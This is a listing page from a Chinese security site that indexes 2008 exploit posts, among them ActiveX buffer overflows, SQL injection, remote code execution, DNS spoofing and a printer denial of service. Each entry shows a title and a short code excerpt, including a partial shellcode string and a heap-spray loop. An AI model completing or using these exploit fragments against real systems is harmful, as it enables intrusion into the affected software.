首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
ESET Smart Security 3.0.667.0 Privilege Escalation PoC
  日期:2008-08-18 10:45:46 点击:60 评论:0
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - Orange Bat advisory - Name : ESET Smart Security 3.0.667.0 Class : Privilage escalation Published : 2008-08-14 Credit: g_ (g_ # orange-bat # com) - - Details - File: easdrv.sys .text:00012B92 loc_12B9
Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC
  日期:2008-08-15 11:33:48 点击:60 评论:0
var body='OBJECT CLASSID=CLSID:C932BA85-4374-101B-A56C-00AA003668DC width=10PARAM NAME=Mask VALUE='; var body1='/OBJECT'; var buf=''; for (i=1;i=1945;i++){buf=buf+unescape(%0C);} document.write(body+buf+body1);
>FlashGet 1.9 (FTP PWD Response) Remote BOF Exploit PoC 0day
  日期:2008-08-14 10:06:27 点击:42 评论:0
#!/usr/bin/python # FlashGet 1.9 (FTP PWD Response) 0day Remote Buffer Overflow PoC Exploit # Bug discovered by Krystian Kloskowski (h07) h07@interia.pl # Testen on: FlashGet 1.9 / XP SP2 Polish # Product URL: http://www.flashget.com/en/download.htm?
IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit
  日期:2008-08-14 10:04:45 点击:63 评论:0
/********************************************************************/ /* [Crpt] IntelliTamper v2.07/2.08 Beta 4 sploit by kralor [Crpt] */ /********************************************************************/ /* NO MORE */ /* CONFIDENTIAL CONFIDENT
IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
  日期:2008-08-11 11:14:53 点击:34 评论:0
/** ** ** IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit. ** ** Based on exploit by Koshi (written in Perl). This one should be more ** stable. Just for fun and to learn more about win32 exploitation. ** ** by Wojciech Pawliko
Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit
  日期:2008-08-11 11:14:15 点击:23 评论:0
?php /* . vuln.: Quicksilver Forums 1.4.1 (forums[]) Remote SQL Injection Exploit . download: http://www.quicksilverforums.com/ . . author: irk4z[at]yahoo.pl . homepage: http://irk4z.wordpress.com/ . . greets: all friends ;) . . this is PoC exploit *
Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
  日期:2008-08-11 11:13:11 点击:26 评论:0
html body object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target / /object script language=javascript // k`sOSe 08/08/2008 // tested in IE6, XP SP1 var shellcode = unescape(%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u01
Sun xVM VirtualBox < 1.6.4 Privilege Escalation Vulnerability PoC
  日期:2008-08-11 11:11:55 点击:43 评论:0
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Sun xVM VirtualBox Privilege Escalation Vulnerability *Advisory Information* Title: Sun xVM VirtualBox Privilege Escala
BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit
  日期:2008-08-11 11:10:21 点击:30 评论:0
#!/usr/bin/perl # # Title: BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC) # # Summary: BlazeDVD is leading powerful and easy-to-use DVD player software. # It can provide superior video and audio(Dolby) quality, together with othe
Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC
  日期:2008-08-11 11:05:37 点击:23 评论:0
html body object classid='clsid:82351441-9094-11D1-A24B-00A0C932C7DF' id='target' / /object script language=javascript // anigif.ocx by www.jcomsoft.com can be found distribuited with some applications, // I found it in Download Accelerator Plus 6.8.
Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit
  日期:2008-08-07 13:13:57 点击:86 评论:0
?php error_reporting(E_ALLE_NOTICE); print_r( +------------------------------------------------------------------+ Exploit discuz6.0.1 Just work as php=5 mysql=4.1 BY james +------------------------------------------------------------------+ ); if($a
LoveCMS 1.6.2 Final Update Settings Remote Exploit
  日期:2008-08-07 11:59:13 点击:17 评论:0
#!/usr/bin/ruby # ## Exploit by PoMdaPiMp! ## --------------------- ## pomdapimp(at)gmail(dotcom) ## ## LoveCMS Exploit Series ## Episode 3: changing site settings ... ## ## Description: Simply change the site settings ! ## ## Usage: ./LoveCMS_3_sett
LoveCMS 1.6.2 Final Remote Code Execution Exploit
  日期:2008-08-07 11:58:18 点击:21 评论:0
#!/usr/bin/ruby # ## Exploit by PoMdaPiMp! ## --------------------- ## pomdapimp(at)gmail(dotcom) ## ## LoveCMS Exploit Series ## Episode 1: adding a side block ## ## Description: add some php into a block container ## on the side of the site. phpinf
Joomla Component EZ Store Remote Blind SQL Injection Exploit
  日期:2008-08-04 11:00:29 点击:30 评论:0
#!/usr/bin/perl #Note:Sometimes you have to change the regexp to viewcategory/catid,.$cid. use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print n; print ################################################################n; print # Joomla Compon
TGS CMS 0.3.2r2 Remote Code Execution Exploit
  日期:2008-08-04 10:59:40 点击:29 评论:0
#TGS CMS Remote Code Execution Exploit #by 0in #from Dark-Coders Group! # www.dark-coders.pl # Contact: 0in(dot)email[at]gmail(dot)com # Greetings to:die_angel,suN8Hclf,m4r1usz,cOndemned,str0ke # Dork:NULL - because You cannot kill what you did not c
BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)
  日期:2008-08-04 10:58:24 点击:64 评论:0
/* h0dns_spoof.c - zmda - saik0pod@yahoo.com * - spoof dns on ircd's using the h0dns code * * - spoof dns on anything using the adns (asynchronous dns resolver) code * * - The bug: * - Static source port used by the adns code * - Sequential DNS ids i
Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
  日期:2008-08-04 10:56:56 点击:31 评论:0
#!/usr/bin/perl # carved-out by: crit3rion, just making th3 world a b3tt3r plac3! # Xerox_Remote_DoS.20080801.ver01 (tanx to dr0pz0N3 for reminding me to close my #$**! s0ck3t) # Make: Xerox # Model: Phaser 8400 # Firmware: 03/03/2004 # # What's the
IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit
  日期:2008-08-04 10:56:07 点击:24 评论:0
/* * IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Expoit * * Discovered Written by r0ut3r (writ3r [at] gmail.com) * Many Thanks to Luigi Auriemma (http://aluigi.org) * * Greets to shinnai (http://www.shinnai.net) * and Guido Landi * * IntelliTa
moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit
  日期:2008-08-04 10:54:30 点击:28 评论:0
#!/usr/bin/perl # # moziloCMS 1.10.1 Perl exploit # # discovered written by Ams # ax330d [doggy] gmail [dot] com # # DESCRIPTION: # Vulnerability hides in download.php, which we can use to download any file we want to. # Here, for example, admin/conf
Coppermine Photo Gallery <= 1.4.18 LFI / Remote Code Execution Exploit
  日期:2008-08-01 11:24:57 点击:325 评论:0
?php /* ---------------------------------------------------------------------- Coppermine Photo Gallery = 1.4.18 LFI / Remote Code Execution Exploit ---------------------------------------------------------------------- author...: EgiX mail.....: n0b
共637页/12733条记录 首页 上一页 [512] [513] [514] 515 [516] [517] [518] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved